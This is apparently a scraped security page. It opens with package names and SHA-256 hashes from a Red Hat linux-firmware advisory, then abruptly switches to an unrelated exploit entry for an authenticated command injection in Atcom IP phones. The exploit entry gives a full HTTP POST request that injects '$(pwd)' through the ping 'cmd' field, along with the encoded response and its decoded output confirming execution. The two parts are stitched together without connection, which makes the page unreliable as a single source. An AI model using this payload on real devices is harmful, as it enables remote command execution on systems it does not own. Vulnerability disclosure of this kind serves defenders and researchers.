SHA-256: 65625c27d5e3cc10e899ea0e5f174370cf4d6c21d06c335925486f2774d9e958

iwl3945-firmware-15.32.2.9-100.el8\_2.1.noarch.rpm

SHA-256: 88dd7e01f783bea27b0b1b01780fe4eb700005bac784555a46c879ad15adfd24

iwl4965-firmware-228.61.2.24-100.el8\_2.1.noarch.rpm

SHA-256: 9c629613cd961c4a9ae2fa83f0a574ba29ead83bc78e5ba0e9bb6928d6606407

iwl5000-firmware-8.83.5.1\_1-100.el8\_2.1.noarch.rpm

SHA-256: f40da742b2bd32e3f1c9e294c8cb38900ac096e8a479046b9feaec0ceaa79da2

iwl5150-firmware-8.24.2.2-100.el8\_2.1.noarch.rpm

SHA-256: fdac2ee486cbbbdd77a507c7518b7642cd61ff995ae4c7678080fa56780600df

iwl6000-firmware-9.221.4.1-100.el8\_2.1.noarch.rpm

SHA-256: bbd02c73e7b8b4c8b78c481e3b65fb0313ac640801d6877c0f9cbf1ef16f3a41

iwl6000g2a-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: d155f2278b66119af1d537c77a507e1570bab7caa1abcbcb5d55a987943a1194

iwl6000g2b-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: 36ed577cd95328d4cd8456c5a08c70683ab326f9850b384bfeaa6db781b53833

iwl6050-firmware-41.28.5.1-100.el8\_2.1.noarch.rpm

SHA-256: 3b5c1313d3e4f0f0bf434e392cc1ca02d3fa805aa183c7fbb39db8eaf7edc89f

iwl7260-firmware-25.30.13.0-100.el8\_2.1.noarch.rpm

SHA-256: a86e391a7ceecee4214a2ab8a6d51e3da5e328a7dd62966ede2b82829b0bafd9

libertas-sd8686-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: 4e92b88f3e81b7c2946c2bec0f6db1c95a26db7e0bb3ba8a2f3bb94316c71b75

libertas-sd8787-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: 9a471fdca5f148474461c345c8a596d2a94ad057301cc5164cd4ad72b596ffb8

libertas-usb8388-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: 659bbe0f09559d3d2cc0ae15523378ed36fed7b9731354df6340cd09f40ea691

libertas-usb8388-olpc-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: 58a6c898ac01bb6b1191ccb4d2a6b3465095d6a5716ccc79e4481dd0144daf12

linux-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: e9e9d84a38ded3d6c192d70c8ccb1b2bcdcf1b67c17e9073d6ae5a7c6d5bd65f

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:5591: Red Hat Security Advisory: linux-firmware security update

Atcom version 2.7.x.x suffers from an authenticated remote code injection vulnerability.

    # Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection# Google Dork: N/A# Date: 07/09/2023# Exploit Author: Mohammed Adel# Vendor Homepage: https://www.atcom.cn/# Software Link:https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html# Version: All versions above 2.7.x.x# Tested on: Kali LinuxExploit Request:POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1Host: {TARGET_IP}User-Agent: polarContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 49Authorization: Digest username="admin", realm="IP Phone WebConfiguration", nonce="value_here",uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping",response="value_here", qop=auth, nc=value_here, cnonce="value_here"cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_pingResponse:{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}The value of "ping_cmd_result" is encoded as base64. Decoding thevalue of "ping_cmd_result" reveals the result of the command executedas shown below:ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'

Tag

#web